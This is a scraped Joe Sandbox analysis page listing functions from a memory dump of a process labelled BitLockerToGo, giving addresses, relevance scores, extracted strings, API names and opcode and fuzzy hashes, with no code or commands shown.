Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 703687b77dcc4597c2506d554c811885e5f5efa08a709e18df2185ad1d1d0df8
Instruction ID: 2deee7a1f1412fd5b8aa508e633101432186bde5c2b3abe534652363dde4516c
Opcode Fuzzy Hash: 703687b77dcc4597c2506d554c811885e5f5efa08a709e18df2185ad1d1d0df8
Instruction Fuzzy Hash: AE12BE716083519FD715CF28E840B2EBBE5BB89314F188A2DF5D59B391D339EA04CB92

Function 006E4DB0 Relevance: 1.8, Strings: 1, Instructions: 558COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 006E5170

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: 49009589b2b9a43868b11f31dcf6c109be0e82092a49167b4b1c4f3e0da498c1
Instruction ID: b46f77f2ad2e5e9a54136f5a0feb41baaee5caa4cb9df602b0362a87b121b1dd
Opcode Fuzzy Hash: 49009589b2b9a43868b11f31dcf6c109be0e82092a49167b4b1c4f3e0da498c1
Instruction Fuzzy Hash: C1120771A0ABC18BD7258E1AC540366BBD3AFE130CF19856DE8978B381E7B1DC45C782

Function 00705EF0 Relevance: 1.8, APIs: 1, Instructions: 259comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0072CB80,00000000,00000001,0072CB70), ref: 00705F19

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 4094ea2b9949327cc456d79c14abb1dcc7b085547c23dcf2f23bd5b6f18cdd3f
Instruction ID: 60b004e01d013fab70efc5f39aba686f1db0f975d7f0bf29e99759a19457ccc8
Opcode Fuzzy Hash: 4094ea2b9949327cc456d79c14abb1dcc7b085547c23dcf2f23bd5b6f18cdd3f
Instruction Fuzzy Hash: 6161ACB1604206DBDB209F64CCA2B7773E4EF85364F044628F9868B2D1F779E844CB61

Function 00727D70 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

P, xrefs: 00727F13

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: ba0cd49de9aaf813aa4ab79d6c7daf1f88e0c78a024d00e441411defa5607e16
Instruction ID: 7db4e680522c8a56d6ed50bf7d3b6838df2439aec641dcef56d3dfeba239222e
Opcode Fuzzy Hash: ba0cd49de9aaf813aa4ab79d6c7daf1f88e0c78a024d00e441411defa5607e16
Instruction Fuzzy Hash: FFD1D77290C2714FD729CE18A89071EB6E1EB84714F19863CE8A5AB380DB79DC46C7D2

Function 0070FD10 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0070FFF8

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 784b5130c64c8c48357e978bc1772135aee257f53ddad6a8b07dd3f41cbacca3
Instruction ID: de6b98f7e3f2b23987107a0af03e820921a1b0c4e70fe142d0d972f21b04929e
Opcode Fuzzy Hash: 784b5130c64c8c48357e978bc1772135aee257f53ddad6a8b07dd3f41cbacca3
Instruction Fuzzy Hash: 6BC117B2A04305EBD725CE28C4547ABB7E66F85310F188A2DE499873C2E77CDD8587D1

Function 006F5081 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

rMo, xrefs: 006F5065

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: rMo
API String ID: 1279760036-820914349
Opcode ID: cd7e7eac9fac4c410ed80de58acb861112f41d699cb40cb482dd82f611aa23fb
Instruction ID: d0deaaefebe68f3acfdc8c433b3da3a1bad465dafcf2de2ddd42e795e7f128b8
Opcode Fuzzy Hash: cd7e7eac9fac4c410ed80de58acb861112f41d699cb40cb482dd82f611aa23fb
Instruction Fuzzy Hash: 79C1D271609312CBC724CF28C880A6BB3F2FF99714F19856DE685873A5EB349D51CB42

Function 0071F2AC Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0071F4A0

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: aed706058f71aeadd5d323f5274a9a15eb4903d08a4c1dd234c02b0b69d29626
Instruction ID: 66ed37dbce6a638ed5809afff5dd3a2cc8a3028e2af5bc63a2fbdbd1e1079718
Opcode Fuzzy Hash: aed706058f71aeadd5d323f5274a9a15eb4903d08a4c1dd234c02b0b69d29626
Instruction Fuzzy Hash: 2691F271A04255CFEB14CFA8E8947AFB7B1FB48312F188828D916E7292D73D9901CB50

Function 007283F0 Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

Pabc, xrefs: 0072856B

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Pabc
API String ID: 0-539773038
Opcode ID: afc48d8819762d187abb3426e6fd1a7c0f8b9a6e60ac8b42e84871a935f643f8
Instruction ID: 7300c81fe1bb8b2c3e72350611e63176024f2b89e25854feb91a0f72990299e0
Opcode Fuzzy Hash: afc48d8819762d187abb3426e6fd1a7c0f8b9a6e60ac8b42e84871a935f643f8
Instruction Fuzzy Hash: E7912575A09252CFDB14CF58E89076EB7F1FF49316F198468D884A7351C379AE10CBA2

Function 007274C0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

4`[b, xrefs: 007276E0

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b
API String ID: 2994545307-3962175265
Opcode ID: 29e618eb4f961bfde4c464c9823f666aaceb64fbf278c780df74d46e037002cd
Instruction ID: 14334c0015f1e591c27af38b2d6f6747d69f4b29e9859cf970839edc75b6e5ec
Opcode Fuzzy Hash: 29e618eb4f961bfde4c464c9823f666aaceb64fbf278c780df74d46e037002cd
Instruction Fuzzy Hash: 94A1F17160C361ABE728CB14ED84B6BBBE1EF89351F58881CF48497351E739E850CB92

Function 0070F5D0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

", xrefs: 0070F836

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 57fd4449aa32aaf9c518165ed4b054b0807d9bc42b656f856b1c71475467dfc6
Instruction ID: 60065272ae36dadc9d17ec3b1843313dc9937fbfe6294fed882ac99f9d302495
Opcode Fuzzy Hash: 57fd4449aa32aaf9c518165ed4b054b0807d9bc42b656f856b1c71475467dfc6
Instruction Fuzzy Hash: 1F71E432B097118BD7349D6D888035BB6C3ABC5330F29C778E8A48BBE5DA79CC458781

Function 007162B0 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00716389

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: f844bca4d85c605816fb19ce3b29c5530e155f5c06e03823421d2a27e51d84cd
Instruction ID: 639595cfef6692d3d45dea08e51040076dabe70646e7aaa3fc9ea1fa55032c2a
Opcode Fuzzy Hash: f844bca4d85c605816fb19ce3b29c5530e155f5c06e03823421d2a27e51d84cd
Instruction Fuzzy Hash: 78711733B195914BC7248D7C4C412E9AA531BE633473EC37AE9B19B3D5D67D8C428391

Function 007178C0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

0, xrefs: 0071791B

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9773840b9d9763a91cbb3bfd2bf2932f68eab270a4950de24f5d7d9a1f32dcaf
Instruction ID: 6901fde1b5670bf759f6b8de005047271784ac17e148c7fdcdc11c94a9d1f657
Opcode Fuzzy Hash: 9773840b9d9763a91cbb3bfd2bf2932f68eab270a4950de24f5d7d9a1f32dcaf
Instruction Fuzzy Hash: CA711637B5DA9047C72C897C4C122F97AA34B96330F2DC3A9E9B28B3E1D56C4D4AD250

Function 007272C0 Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00727480

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: d62c45ef29c4672b99a3ba05016de46e77f36e7311ed76ab2b05f4324c75a991
Instruction ID: bb58eab933374d448b3abff66d856c2b750bc16d24b03c01f8f24c062c7abef3
Opcode Fuzzy Hash: d62c45ef29c4672b99a3ba05016de46e77f36e7311ed76ab2b05f4324c75a991
Instruction Fuzzy Hash: 58511A3160C2609BD718EA18E990F2EB7E1EF85715F58862CF9D557391D739AC00C792

Function 00729A10 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

@, xrefs: 00729A90

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 6e86d8726ce4ce9c5a1689dbe18a975558d25431dd370aac2b6fc0cf7407f42d
Instruction ID: 874220026d7622d85c637f65389521a762a3aae363acf9d647b1523fe49c2b43
Opcode Fuzzy Hash: 6e86d8726ce4ce9c5a1689dbe18a975558d25431dd370aac2b6fc0cf7407f42d
Instruction Fuzzy Hash: 0631AD759083549BD314DF18E884A2FBBE5FFC9304F18CA2CE6C897240D7799908CB96

Function 0070C5E3 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

3<<3, xrefs: 0070C68A

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 3<<3
API String ID: 0-579374158
Opcode ID: 93130281a164075fe6fbd877449169fae1ba6981a4ea7916f58414c81ac29df8
Instruction ID: 6c1ea25164b3ed6b2de5e9debbcc423efc0a1d54248fd2314a45c92b20b767f6
Opcode Fuzzy Hash: 93130281a164075fe6fbd877449169fae1ba6981a4ea7916f58414c81ac29df8
Instruction Fuzzy Hash: 9C316B7450C384CFE324DF65E854B1BBBE1BB89305F468A5CE1848B2A1DBB9C910CB96

Function 006EBC60 Relevance: .8, Instructions: 839COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a61cf8f9557713318e1927bc6a82629a140bba5c72cb8e1fc4a54313479d097
Instruction ID: ca9d173db826ac23667a73cbe9671b570448dab0c135de8f8c6a7de6b1750aba
Opcode Fuzzy Hash: 3a61cf8f9557713318e1927bc6a82629a140bba5c72cb8e1fc4a54313479d097
Instruction Fuzzy Hash: F452E23160A3518BC725DF1DD8802ABB3E2FFD4324F29892DD9D697385D735A912CB82

Function 006EB150 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: addb51fc312bfdfac5dbc4d23d4a1f4ad1730023a88a423bfb8469a1cff70ad7
Instruction ID: 70c2a89f8a5512b51d837de974c0b6dd86f38dfba885e8ca17bcd6fd09673e26
Opcode Fuzzy Hash: addb51fc312bfdfac5dbc4d23d4a1f4ad1730023a88a423bfb8469a1cff70ad7
Instruction Fuzzy Hash: EE52CF70909BC8CFEB35CB25C4843E7BBE2EB91314F14686DC5E606B86D3B9A985C741

Function 006E6F00 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 951fd1b0fb6edbd391e34dde896e836da72e761df7aed27963908926b0f968f8
Instruction ID: 5fe4c25d9174fad8a45f0c5fe3cda587d0f8a8629164bbb6ea9de3c12845d059
Opcode Fuzzy Hash: 951fd1b0fb6edbd391e34dde896e836da72e761df7aed27963908926b0f968f8
Instruction Fuzzy Hash: 8952C13150D3858FCB15CF2AC0906EABBE2BF98318F198A6DF8995B341D774D949CB81

Function 006E7900 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dbe5d661810346f619dbfbe89a35a6d8a9ec5a8211df7578dbe6e8f097c5adc
Instruction ID: 4aa9bcd40069fb7998ccfc611174bde31ecccb884ba5119f89ee9f4e40748e11
Opcode Fuzzy Hash: 1dbe5d661810346f619dbfbe89a35a6d8a9ec5a8211df7578dbe6e8f097c5adc
Instruction Fuzzy Hash: 4A32127051AB918FC378CF2AC59056ABBF2BF45710B604A2ED6A787B90D736F845CB10

Function 006EA0C0 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60dfa090c44278e5d20a68f1fa3937b32f657ebf4f912e448e8ba26d65979fb0
Instruction ID: e36b8189010258db5104da820139ca3a86ab023d934ee6dc2d15adb29963214d
Opcode Fuzzy Hash: 60dfa090c44278e5d20a68f1fa3937b32f657ebf4f912e448e8ba26d65979fb0
Instruction Fuzzy Hash: C4F19C712097818FC724CF69C881A6BFBE2EF98300F44891DE4D587791E271E948CB97

Function 006EC9D0 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fae280784bfdc83c200cb80ee5d1b3d6c27cc23c2df552f8231dc4490cc1cad
Instruction ID: bbaaa5e57d4e40b8862a09990cbd14ec4a986f4eaab74c96e13c2fc1a6323255
Opcode Fuzzy Hash: 7fae280784bfdc83c200cb80ee5d1b3d6c27cc23c2df552f8231dc4490cc1cad
Instruction Fuzzy Hash: F9A13C73E057A14BC3218A3EC88129A77D7AB81770F6A8765D8D9DB399F6398C4347C0

Function 00727870 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc31d712539a67122710877471720d8c21ce2262b707fd2df308c3c46d4a685
Instruction ID: e5e643f16aa9eda57c7d4a352d6a3870fd9a3b42bb87ce4a6d89ab2e8480c9ce
Opcode Fuzzy Hash: 0bc31d712539a67122710877471720d8c21ce2262b707fd2df308c3c46d4a685
Instruction Fuzzy Hash: 00B1D672A083608BD718DA29ED4176FB7E6EBC4324F04892DF998D7341EA38DD44C792

Function 006F447C Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71b29dbfbb87aa07e397ac4a0405741e534d091fa5f1af1aa8262c66416150e
Instruction ID: 354c1229ebd786617c85cabf3f26c66f33ca51fea4d058d684058fddd24e557a
Opcode Fuzzy Hash: f71b29dbfbb87aa07e397ac4a0405741e534d091fa5f1af1aa8262c66416150e
Instruction Fuzzy Hash: 18B15770508385ABD7209B18D880B6FBBF6EF86385F14481DF6C897261E736D884CB57

Function 006EACC0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70e885100ee8c3020c2e8fccf12862dbe80f03903c8207277d6c2c14b44affc
Instruction ID: 07857fed0ca6b2b181aea36d20c1eac21629550c35cf5109c4819a4ec401f6b5
Opcode Fuzzy Hash: d70e885100ee8c3020c2e8fccf12862dbe80f03903c8207277d6c2c14b44affc
Instruction Fuzzy Hash: 4AC15BB2A187818FC360CF69CC967ABB7E1BF85318F08492DD1D9C6342E778A155CB46

Function 0072A120 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

